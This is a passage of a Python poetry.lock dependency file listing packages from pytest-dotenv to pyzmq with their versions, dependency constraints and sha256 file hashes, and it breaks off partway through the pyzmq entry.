[[package]] name = "pytest-dotenv" version = "0.5.2" description = "A py.test plugin that parses environment files before running tests" optional = false python-versions = "*" files = [ {file = "pytest-dotenv-0.5.2.tar.gz", hash = "sha256:2dc6c3ac6d8764c71c6d2804e902d0ff810fa19692e95fe138aefc9b1aa73732"}, {file = "pytest_dotenv-0.5.2-py3-none-any.whl", hash = "sha256:40a2cece120a213898afaa5407673f6bd924b1fa7eafce6bda0e8abffe2f710f"}, ] [package.dependencies] pytest = ">=5.0.0" python-dotenv = ">=0.9.1" [[package]] name = "pytest-mock" version = "3.12.0" description = "Thin-wrapper around the mock package for easier use with pytest" optional = false python-versions = ">=3.8" files = [ {file = "pytest-mock-3.12.0.tar.gz", hash = "sha256:31a40f038c22cad32287bb43932054451ff5583ff094bca6f675df2f8bc1a6e9"}, {file = "pytest_mock-3.12.0-py3-none-any.whl", hash = "sha256:0972719a7263072da3a21c7f4773069bcc7486027d7e8e1f81d98a47e701bc4f"}, ] [package.dependencies] pytest = ">=5.0" [package.extras] dev = ["pre-commit", "pytest-asyncio", "tox"] [[package]] name = "pytest-socket" version = "0.6.0" description = "Pytest Plugin to disable socket calls during tests" optional = false python-versions = ">=3.7,<4.0" files = [ {file = "pytest_socket-0.6.0-py3-none-any.whl", hash = "sha256:cca72f134ff01e0023c402e78d31b32e68da3efdf3493bf7788f8eba86a6824c"}, {file = "pytest_socket-0.6.0.tar.gz", hash = "sha256:363c1d67228315d4fc7912f1aabfd570de29d0e3db6217d61db5728adacd7138"}, ] [package.dependencies] pytest = ">=3.6.3" [[package]] name = "pytest-vcr" version = "1.0.2" description = "Plugin for managing VCR.py cassettes" optional = false python-versions = "*" files = [ {file = "pytest-vcr-1.0.2.tar.gz", hash = "sha256:23ee51b75abbcc43d926272773aae4f39f93aceb75ed56852d0bf618f92e1896"}, {file = "pytest_vcr-1.0.2-py2.py3-none-any.whl", hash = "sha256:2f316e0539399bea0296e8b8401145c62b6f85e9066af7e57b6151481b0d6d9c"}, ] [package.dependencies] pytest = ">=3.6.0" vcrpy = "*" [[package]] name = "pytest-watcher" version = "0.2.6" description = "Continiously runs pytest on changes in *.py files" optional = false python-versions = ">=3.7.0,<4.0.0" files = [ {file = "pytest-watcher-0.2.6.tar.gz", hash = "sha256:351dfb3477366030ff275bfbfc9f29bee35cd07f16a3355b38bf92766886bae4"}, {file = "pytest_watcher-0.2.6-py3-none-any.whl", hash = "sha256:0a507159d051c9461790363e0f9b2827c1d82ad2ae8966319598695e485b1dd5"}, ] [package.dependencies] watchdog = ">=2.0.0" [[package]] name = "python-arango" version = "7.7.0" description = "Python Driver for ArangoDB" optional = true python-versions = ">=3.8" files = [ {file = "python-arango-7.7.0.tar.gz", hash = "sha256:0260ae03c99f5cd786a5c9ba36601c41491566f6e92bbc6b59bf5d91712dd2ce"}, {file = "python_arango-7.7.0-py3-none-any.whl", hash = "sha256:c6e2c6147ba7ed53c9f3a92494b980ad5a4a986b6f11c2e11d5bd183f18d4c5c"}, ] [package.dependencies] importlib-metadata = ">=4.7.1" packaging = ">=23.1" PyJWT = "*" requests = "*" requests-toolbelt = "*" setuptools = ">=42" urllib3 = ">=1.26.0" [package.extras] dev = ["black (>=22.3.0)", "flake8 (>=4.0.1)", "isort (>=5.10.1)", "mock", "mypy (>=0.942)", "pre-commit (>=2.17.0)", "pytest (>=7.1.1)", "pytest-cov (>=3.0.0)", "sphinx", "sphinx-rtd-theme", "types-pkg-resources", "types-requests", "types-setuptools"] [[package]] name = "python-dateutil" version = "2.8.2" description = "Extensions to the standard Python datetime module" optional = false python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7" files = [ {file = "python-dateutil-2.8.2.tar.gz", hash = "sha256:0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86"}, {file = "python_dateutil-2.8.2-py2.py3-none-any.whl", hash = "sha256:961d03dc3453ebbc59dbdea9e4e11c5651520a876d0f4db161e8674aae935da9"}, ] [package.dependencies] six = ">=1.5" [[package]] name = "python-dotenv" version = "1.0.0" description = "Read key-value pairs from a .env file and set them as environment variables" optional = false python-versions = ">=3.8" files = [ {file = "python-dotenv-1.0.0.tar.gz", hash = "sha256:a8df96034aae6d2d50a4ebe8216326c61c3eb64836776504fcca410e5937a3ba"}, {file = "python_dotenv-1.0.0-py3-none-any.whl", hash = "sha256:f5971a9226b701070a4bf2c38c89e5a3f0d64de8debda981d1db98583009122a"}, ] [package.extras] cli = ["click (>=5.0)"] [[package]] name = "python-json-logger" version = "2.0.7" description = "A python library adding a json log formatter" optional = false python-versions = ">=3.6" files = [ {file = "python-json-logger-2.0.7.tar.gz", hash = "sha256:23e7ec02d34237c5aa1e29a070193a4ea87583bb4e7f8fd06d3de8264c4b2e1c"}, {file = "python_json_logger-2.0.7-py3-none-any.whl", hash = "sha256:f380b826a991ebbe3de4d897aeec42760035ac760345e57b812938dc8b35e2bd"}, ] [[package]] name = "pytz" version = "2023.3.post1" description = "World timezone definitions, modern and historical" optional = false python-versions = "*" files = [ {file = "pytz-2023.3.post1-py2.py3-none-any.whl", hash = "sha256:ce42d816b81b68506614c11e8937d3aa9e41007ceb50bfdcb0749b921bf646c7"}, {file = "pytz-2023.3.post1.tar.gz", hash = "sha256:7b4fddbeb94a1eba4b557da24f19fdf9db575192544270a9101d8509f9f43d7b"}, ] [[package]] name = "pytz-deprecation-shim" version = "0.1.0.post0" description = "Shims to make deprecation of pytz easier" optional = true python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*,>=2.7" files = [ {file = "pytz_deprecation_shim-0.1.0.post0-py2.py3-none-any.whl", hash = "sha256:8314c9692a636c8eb3bda879b9f119e350e93223ae83e70e80c31675a0fdc1a6"}, {file = "pytz_deprecation_shim-0.1.0.post0.tar.gz", hash = "sha256:af097bae1b616dde5c5744441e2ddc69e74dfdcb0c263129610d85b87445a59d"}, ] [package.dependencies] "backports.zoneinfo" = {version = "*", markers = "python_version >= \"3.6\" and python_version < \"3.9\""} tzdata = {version = "*", markers = "python_version >= \"3.6\""} [[package]] name = "pyvespa" version = "0.33.0" description = "Python API for vespa.ai" optional = true python-versions = ">=3.6" files = [ {file = "pyvespa-0.33.0-py3-none-any.whl", hash = "sha256:2681910b3ac5f0259a9e41e6e2649caba2801e836b4c295cc2e48ab25b09672c"}, {file = "pyvespa-0.33.0.tar.gz", hash = "sha256:be3da9022276555b6b25c40b6e846db6e9dbf617486001ba92235ccfab6c9353"}, ] [package.dependencies] aiohttp = "*" cryptography = "*" docker = "*" jinja2 = "*" pandas = "*" requests = "*" tenacity = "*" [package.extras] full = ["keras-tuner", "onnxruntime", "tensorflow", "tensorflow-ranking", "torch (<1.13)", "transformers"] ml = ["keras-tuner", "tensorflow", "tensorflow-ranking", "torch (<1.13)", "transformers"] [[package]] name = "pywin32" version = "306" description = "Python for Window Extensions" optional = false python-versions = "*" files = [ {file = "pywin32-306-cp310-cp310-win32.whl", hash = "sha256:06d3420a5155ba65f0b72f2699b5bacf3109f36acbe8923765c22938a69dfc8d"}, {file = "pywin32-306-cp310-cp310-win_amd64.whl", hash = "sha256:84f4471dbca1887ea3803d8848a1616429ac94a4a8d05f4bc9c5dcfd42ca99c8"}, {file = "pywin32-306-cp311-cp311-win32.whl", hash = "sha256:e65028133d15b64d2ed8f06dd9fbc268352478d4f9289e69c190ecd6818b6407"}, {file = "pywin32-306-cp311-cp311-win_amd64.whl", hash = "sha256:a7639f51c184c0272e93f244eb24dafca9b1855707d94c192d4a0b4c01e1100e"}, {file = "pywin32-306-cp311-cp311-win_arm64.whl", hash = "sha256:70dba0c913d19f942a2db25217d9a1b726c278f483a919f1abfed79c9cf64d3a"}, {file = "pywin32-306-cp312-cp312-win32.whl", hash = "sha256:383229d515657f4e3ed1343da8be101000562bf514591ff383ae940cad65458b"}, {file = "pywin32-306-cp312-cp312-win_amd64.whl", hash = "sha256:37257794c1ad39ee9be652da0462dc2e394c8159dfd913a8a4e8eb6fd346da0e"}, {file = "pywin32-306-cp312-cp312-win_arm64.whl", hash = "sha256:5821ec52f6d321aa59e2db7e0a35b997de60c201943557d108af9d4ae1ec7040"}, {file = "pywin32-306-cp37-cp37m-win32.whl", hash = "sha256:1c73ea9a0d2283d889001998059f5eaaba3b6238f767c9cf2833b13e6a685f65"}, {file = "pywin32-306-cp37-cp37m-win_amd64.whl", hash = "sha256:72c5f621542d7bdd4fdb716227be0dd3f8565c11b280be6315b06ace35487d36"}, {file = "pywin32-306-cp38-cp38-win32.whl", hash = "sha256:e4c092e2589b5cf0d365849e73e02c391c1349958c5ac3e9d5ccb9a28e017b3a"}, {file = "pywin32-306-cp38-cp38-win_amd64.whl", hash = "sha256:e8ac1ae3601bee6ca9f7cb4b5363bf1c0badb935ef243c4733ff9a393b1690c0"}, {file = "pywin32-306-cp39-cp39-win32.whl", hash = "sha256:e25fd5b485b55ac9c057f67d94bc203f3f6595078d1fb3b458c9c28b7153a802"}, {file = "pywin32-306-cp39-cp39-win_amd64.whl", hash = "sha256:39b61c15272833b5c329a2989999dcae836b1eed650252ab1b7bfbe1d59f30f4"}, ] [[package]] name = "pywinpty" version = "2.0.12" description = "Pseudo terminal support for Windows from Python." optional = false python-versions = ">=3.8" files = [ {file = "pywinpty-2.0.12-cp310-none-win_amd64.whl", hash = "sha256:21319cd1d7c8844fb2c970fb3a55a3db5543f112ff9cfcd623746b9c47501575"}, {file = "pywinpty-2.0.12-cp311-none-win_amd64.whl", hash = "sha256:853985a8f48f4731a716653170cd735da36ffbdc79dcb4c7b7140bce11d8c722"}, {file = "pywinpty-2.0.12-cp312-none-win_amd64.whl", hash = "sha256:1617b729999eb6713590e17665052b1a6ae0ad76ee31e60b444147c5b6a35dca"}, {file = "pywinpty-2.0.12-cp38-none-win_amd64.whl", hash = "sha256:189380469ca143d06e19e19ff3fba0fcefe8b4a8cc942140a6b863aed7eebb2d"}, {file = "pywinpty-2.0.12-cp39-none-win_amd64.whl", hash = "sha256:7520575b6546db23e693cbd865db2764097bd6d4ef5dc18c92555904cd62c3d4"}, {file = "pywinpty-2.0.12.tar.gz", hash = "sha256:8197de460ae8ebb7f5d1701dfa1b5df45b157bb832e92acba316305e18ca00dd"}, ] [[package]] name = "pyyaml" version = "6.0.1" description = "YAML parser and emitter for Python" optional = false python-versions = ">=3.6" files = [ {file = "PyYAML-6.0.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d858aa552c999bc8a8d57426ed01e40bef403cd8ccdd0fc5f6f04a00414cac2a"}, {file = "PyYAML-6.0.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:fd66fc5d0da6d9815ba2cebeb4205f95818ff4b79c3ebe268e75d961704af52f"}, {file = "PyYAML-6.0.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:69b023b2b4daa7548bcfbd4aa3da05b3a74b772db9e23b982788168117739938"}, {file = "PyYAML-6.0.1-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:81e0b275a9ecc9c0c0c07b4b90ba548307583c125f54d5b6946cfee6360c733d"}, {file = "PyYAML-6.0.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba336e390cd8e4d1739f42dfe9bb83a3cc2e80f567d8805e11b46f4a943f5515"}, {file = "PyYAML-6.0.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:326c013efe8048858a6d312ddd31d56e468118ad4cdeda36c719bf5bb6192290"}, {file = "PyYAML-6.0.1-cp310-cp310-win32.whl", hash = "sha256:bd4af7373a854424dabd882decdc5579653d7868b8fb26dc7d0e99f823aa5924"}, {file = "PyYAML-6.0.1-cp310-cp310-win_amd64.whl", hash = "sha256:fd1592b3fdf65fff2ad0004b5e363300ef59ced41c2e6b3a99d4089fa8c5435d"}, {file = "PyYAML-6.0.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:6965a7bc3cf88e5a1c3bd2e0b5c22f8d677dc88a455344035f03399034eb3007"}, {file = "PyYAML-6.0.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:f003ed9ad21d6a4713f0a9b5a7a0a79e08dd0f221aff4525a2be4c346ee60aab"}, {file = "PyYAML-6.0.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:42f8152b8dbc4fe7d96729ec2b99c7097d656dc1213a3229ca5383f973a5ed6d"}, {file = "PyYAML-6.0.1-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:062582fca9fabdd2c8b54a3ef1c978d786e0f6b3a1510e0ac93ef59e0ddae2bc"}, {file = "PyYAML-6.0.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d2b04aac4d386b172d5b9692e2d2da8de7bfb6c387fa4f801fbf6fb2e6ba4673"}, {file = "PyYAML-6.0.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:e7d73685e87afe9f3b36c799222440d6cf362062f78be1013661b00c5c6f678b"}, {file = "PyYAML-6.0.1-cp311-cp311-win32.whl", hash = "sha256:1635fd110e8d85d55237ab316b5b011de701ea0f29d07611174a1b42f1444741"}, {file = "PyYAML-6.0.1-cp311-cp311-win_amd64.whl", hash = "sha256:bf07ee2fef7014951eeb99f56f39c9bb4af143d8aa3c21b1677805985307da34"}, {file = "PyYAML-6.0.1-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:855fb52b0dc35af121542a76b9a84f8d1cd886ea97c84703eaa6d88e37a2ad28"}, {file = "PyYAML-6.0.1-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:40df9b996c2b73138957fe23a16a4f0ba614f4c0efce1e9406a184b6d07fa3a9"}, {file = "PyYAML-6.0.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6c22bec3fbe2524cde73d7ada88f6566758a8f7227bfbf93a408a9d86bcc12a0"}, {file = "PyYAML-6.0.1-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:8d4e9c88387b0f5c7d5f281e55304de64cf7f9c0021a3525bd3b1c542da3b0e4"}, {file = "PyYAML-6.0.1-cp312-cp312-win32.whl", hash = "sha256:d483d2cdf104e7c9fa60c544d92981f12ad66a457afae824d146093b8c294c54"}, {file = "PyYAML-6.0.1-cp312-cp312-win_amd64.whl", hash = "sha256:0d3304d8c0adc42be59c5f8a4d9e3d7379e6955ad754aa9d6ab7a398b59dd1df"}, {file = "PyYAML-6.0.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:50550eb667afee136e9a77d6dc71ae76a44df8b3e51e41b77f6de2932bfe0f47"}, {file = "PyYAML-6.0.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1fe35611261b29bd1de0070f0b2f47cb6ff71fa6595c077e42bd0c419fa27b98"}, {file = "PyYAML-6.0.1-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:704219a11b772aea0d8ecd7058d0082713c3562b4e271b849ad7dc4a5c90c13c"}, {file = "PyYAML-6.0.1-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:afd7e57eddb1a54f0f1a974bc4391af8bcce0b444685d936840f125cf046d5bd"}, {file = "PyYAML-6.0.1-cp36-cp36m-win32.whl", hash = "sha256:fca0e3a251908a499833aa292323f32437106001d436eca0e6e7833256674585"}, {file = "PyYAML-6.0.1-cp36-cp36m-win_amd64.whl", hash = "sha256:f22ac1c3cac4dbc50079e965eba2c1058622631e526bd9afd45fedd49ba781fa"}, {file = "PyYAML-6.0.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:b1275ad35a5d18c62a7220633c913e1b42d44b46ee12554e5fd39c70a243d6a3"}, {file = "PyYAML-6.0.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:18aeb1bf9a78867dc38b259769503436b7c72f7a1f1f4c93ff9a17de54319b27"}, {file = "PyYAML-6.0.1-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:596106435fa6ad000c2991a98fa58eeb8656ef2325d7e158344fb33864ed87e3"}, {file = "PyYAML-6.0.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:baa90d3f661d43131ca170712d903e6295d1f7a0f595074f151c0aed377c9b9c"}, {file = "PyYAML-6.0.1-cp37-cp37m-win32.whl", hash = "sha256:9046c58c4395dff28dd494285c82ba00b546adfc7ef001486fbf0324bc174fba"}, {file = "PyYAML-6.0.1-cp37-cp37m-win_amd64.whl", hash = "sha256:4fb147e7a67ef577a588a0e2c17b6db51dda102c71de36f8549b6816a96e1867"}, {file = "PyYAML-6.0.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:1d4c7e777c441b20e32f52bd377e0c409713e8bb1386e1099c2415f26e479595"}, {file = "PyYAML-6.0.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a0cd17c15d3bb3fa06978b4e8958dcdc6e0174ccea823003a106c7d4d7899ac5"}, {file = "PyYAML-6.0.1-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:28c119d996beec18c05208a8bd78cbe4007878c6dd15091efb73a30e90539696"}, {file = "PyYAML-6.0.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7e07cbde391ba96ab58e532ff4803f79c4129397514e1413a7dc761ccd755735"}, {file = "PyYAML-6.0.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:49a183be227561de579b4a36efbb21b3eab9651dd81b1858589f796549873dd6"}, {file = "PyYAML-6.0.1-cp38-cp38-win32.whl", hash = "sha256:184c5108a2aca3c5b3d3bf9395d50893a7ab82a38004c8f61c258d4428e80206"}, {file = "PyYAML-6.0.1-cp38-cp38-win_amd64.whl", hash = "sha256:1e2722cc9fbb45d9b87631ac70924c11d3a401b2d7f410cc0e3bbf249f2dca62"}, {file = "PyYAML-6.0.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:9eb6caa9a297fc2c2fb8862bc5370d0303ddba53ba97e71f08023b6cd73d16a8"}, {file = "PyYAML-6.0.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:c8098ddcc2a85b61647b2590f825f3db38891662cfc2fc776415143f599bb859"}, {file = "PyYAML-6.0.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5773183b6446b2c99bb77e77595dd486303b4faab2b086e7b17bc6bef28865f6"}, {file = "PyYAML-6.0.1-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b786eecbdf8499b9ca1d697215862083bd6d2a99965554781d0d8d1ad31e13a0"}, {file = "PyYAML-6.0.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bc1bf2925a1ecd43da378f4db9e4f799775d6367bdb94671027b73b393a7c42c"}, {file = "PyYAML-6.0.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:04ac92ad1925b2cff1db0cfebffb6ffc43457495c9b3c39d3fcae417d7125dc5"}, {file = "PyYAML-6.0.1-cp39-cp39-win32.whl", hash = "sha256:faca3bdcf85b2fc05d06ff3fbc1f83e1391b3e724afa3feba7d13eeab355484c"}, {file = "PyYAML-6.0.1-cp39-cp39-win_amd64.whl", hash = "sha256:510c9deebc5c0225e8c96813043e62b680ba2f9c50a08d3724c7f28a747d1486"}, {file = "PyYAML-6.0.1.tar.gz", hash = "sha256:bfdf460b1736c775f2ba9f6a92bca30bc2095067b8a9d77876d1fad6cc3b4a43"}, ] [[package]] name = "pyzmq" version = "25.1.1" description = "Python bindings for 0MQ" optional = false python-versions = ">=3.6" files = [ {file = "pyzmq-25.1.1-cp310-cp310-macosx_10_15_universal2.whl", hash = "sha256:381469297409c5adf9a0e884c5eb5186ed33137badcbbb0560b86e910a2f1e76"}, {file = "pyzmq-25.1.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:955215ed0604dac5b01907424dfa28b40f2b2292d6493445dd34d0dfa72586a8"}, {file = "pyzmq-25.1.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:985bbb1316192b98f32e25e7b9958088431d853ac63aca1d2c236f40afb17c83"}, {file = "pyzmq-25.1.1-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:afea96f64efa98df4da6958bae37f1cbea7932c35878b185e5982821bc883369"}, {file = "pyzmq-25.1.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:76705c9325d72a81155bb6ab48d4312e0032bf045fb0754889133200f7a0d849"}, {file = "pyzmq-25.1.1-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:77a41c26205d2353a4c94d02be51d6cbdf63c06fbc1295ea57dad7e2d3381b71"}, {file = "pyzmq-25.1.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:12720a53e61c3b99d87262294e2b375c915fea93c31fc2336898c26d7aed34cd"}, {file = "pyzmq-25.1.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:57459b68e5cd85b0be8184382cefd91959cafe79ae019e6b1ae6e2ba8a12cda7"}, {file = "pyzmq-25.1.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:292fe3fc5ad4a75bc8df0dfaee7d0babe8b1f4ceb596437213821f761b4589f9"}, {file = "pyzmq-25.1.1-cp310-cp310-win32.whl", hash = "sha256:35b5ab8c28978fbbb86ea54958cd89f5176ce747c1fb3d87356cf698048a7790"}, {file = "pyzmq-25.1.1-cp310-cp310-win_amd64.whl", hash = "sha256:11baebdd5fc5b475d484195e49bae2dc64b94a5208f7c89954e9e354fc609d8f"}, {file = "pyzmq-25.1.1-cp311-cp311-macosx_10_15_universal2.whl", hash = "sha256:d20a0ddb3e989e8807d83225a27e5c2eb2260eaa851532086e9e0fa0d5287d83"}, {file = "pyzmq-25.1.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:e1c1be77bc5fb77d923850f82e55a928f8638f64a61f00ff18a67c7404faf008"}, {file = "pyzmq-25.1.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d89528b4943d27029a2818f847c10c2cecc79fa9590f3cb1860459a5be7933eb"}, {file = "pyzmq-25.1.1-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:90f26dc6d5f241ba358bef79be9ce06de58d477ca8485e3291675436d3827cf8"}, {file = "pyzmq-25.1.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c2b92812bd214018e50b6380ea3ac0c8bb01ac07fcc14c5f86a5bb25e74026e9"}, {file = "pyzmq-25.1.1-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:2f957ce63d13c28730f7fd6b72333814221c84ca2421298f66e5143f81c9f91f"}, {file = "pyzmq-25.1.1-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:047a640f5c9c6ade7b1cc6680a0e28c9dd5a0825135acbd3569cc96ea00b2505"}, {file = "pyzmq-25.1.1-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:7f7e58effd14b641c5e4dec8c7dab02fb67a13df90329e61c869b9cc607ef752"}, {file = "pyzmq-25.1.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:c2910967e6ab16bf6fbeb1f771c89a7050947221ae12a5b0b60f3bca2ee19bca"}, {file = "pyzmq-25.1.1-cp311-cp311-win32.whl", hash = "sha256:76c1c8efb3ca3a1818b837aea423ff8a07bbf7aafe9f2f6582b61a0458b1a329"}, {file = "pyzmq-25.1.1-cp311-cp311-win_amd64.whl", hash = "sha256:44e58a0554b21fc662f2712814a746635ed668d0fbc98b7cb9d74cb798d202e6"}, {file = "pyzmq-25.1.1-cp312-cp312-macosx_10_15_universal2.whl", hash = "sha256:e1ffa1c924e8c72778b9ccd386a7067cddf626884fd8277f503c48bb5f51c762"}, {file = "pyzmq-25.1.1-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:1af379b33ef33757224da93e9da62e6471cf4a66d10078cf32bae8127d3d0d4a"}, {file = "pyzmq-25.1.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cff084c6933680d1f8b2f3b4ff5bbb88538a4aac00d199ac13f49d0698727ecb"}, {file = "pyzmq-25.1.1-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e2400a94f7dd9cb20cd012951a0cbf8249e3d554c63a9c0cdfd5cbb6c01d2dec"}, {file = "pyzmq-25.1.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2d81f1ddae3858b8299d1da72dd7d19dd36aab654c19671aa8a7e7fb02f6638a"}, {file = "pyzmq-25.1.1-cp312-cp312-manylinux_2_28_x86_64.whl", hash = "sha256:255ca2b219f9e5a3a9ef3081512e1358bd4760ce77828e1028b818ff5610b87b"}, {file = "pyzmq-25.1.1-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:a882ac0a351288dd18ecae3326b8a49d10c61a68b01419f3a0b9a306190baf69"}, {file = "pyzmq-25.1.1-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:724c292bb26365659fc434e9567b3f1adbdb5e8d640c936ed901f49e03e5d32e"}, {file = "pyzmq-25.1.1-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:4ca1ed0bb2d850aa8471387882247c68f1e62a4af0ce9c8a1dbe0d2bf69e41fb"}, {file = "pyzmq-25.1.1-cp312-cp312-win32.whl", hash = "sha256:b3451108ab861040754fa5208bca4a5496c65875710f76789a9ad27c801a0075"}, {file = "pyzmq-25.1.1-cp312-cp312-win_amd64.whl", hash = "sha256:eadbefd5e92ef8a345f0525b5cfd01cf4e4cc651a2cffb8f23c0dd184975d787"}, {file = "pyzmq-25.1.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:db0b2af416ba735c6304c47f75d348f498b92952f5e3e8bff449336d2728795d"}, {file = "pyzmq-25.1.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c7c133e93b405eb0d36fa430c94185bdd13c36204a8635470cccc200723c13bb"}, {file = "pyzmq-25.1.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:273bc3959bcbff3f48606b28229b4721716598d76b5aaea2b4a9d0ab454ec062"}, {file = "pyzmq-25.1.1-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:cbc8df5c6a88ba5ae385d8930da02201165408dde8d8322072e3e5ddd4f68e22"}, {file = "pyzmq-25.1.1-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:18d43df3f2302d836f2a56f17e5663e398416e9dd74b205b179065e61f1a6edf"}, {file = "pyzmq-25.1.1-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:73461eed88a88c866656e08f89299720a38cb4e9d34ae6bf5df6f71102570f2e"}, {file = "pyzmq-25.1.1-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:34c850ce7976d19ebe7b9d4b9bb8c9dfc7aac336c0958e2651b88cbd46682123"}, {file = "pyzmq-25.1.1-cp36-cp36m-win32.whl", hash = "sha256:d2045d6d9439a0078f2a34b57c7b18c4a6aef0bee37f22e4ec9f32456c852c71"}, {file = "pyzmq-25.1.1-cp36-cp36m-win_amd64.whl", hash = "sha256:458dea649f2f02a0b244ae6aef8dc29325a2810aa26b07af8374dc2a9faf57e3"}, {file = "pyzmq-25.1.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:7cff25c5b315e63b07a36f0c2bab32c58eafbe57d0dce61b614ef4c76058c115"}, {file = "pyzmq-25.1.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b1579413ae492b05de5a6174574f8c44c2b9b122a42015c5292afa4be2507f28"}, {file = "pyzmq-25.1.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:3d0a409d3b28607cc427aa5c30a6f1e4452cc44e311f843e05edb28ab5e36da0"}, {file = "pyzmq-25.1.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:21eb4e609a154a57c520e3d5bfa0d97e49b6872ea057b7c85257b11e78068222"}, {file = "pyzmq-25.1.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:034239843541ef7a1aee0c7b2cb7f6aafffb005ede965ae9cbd49d5ff4ff73cf"}, {file = "pyzmq-25.1.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:f8115e303280ba09f3898194791a153862cbf9eef722ad8f7f741987ee2a97c7"}, {file = "pyzmq-25.1.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:1a5d26fe8f32f137e784f768143728438877d69a586ddeaad898558dc971a5ae"}, {file = "pyzmq-25.1.1-cp37-cp37m-win32.whl", hash = "sha256:f32260e556a983bc5c7ed588d04c942c9a8f9c2e99213fec11a031e316874c7e"}, {file = "pyzmq-25.1.1-cp37-cp37m-win_amd64.whl", hash = "sha256:abf34e43c531bbb510ae7e8f5b2b1f2a8ab93219510e2b287a944432fad135f3"}, {file = "pyzmq-25.1.1-cp38-cp38-macosx_10_15_universal2.whl", hash = 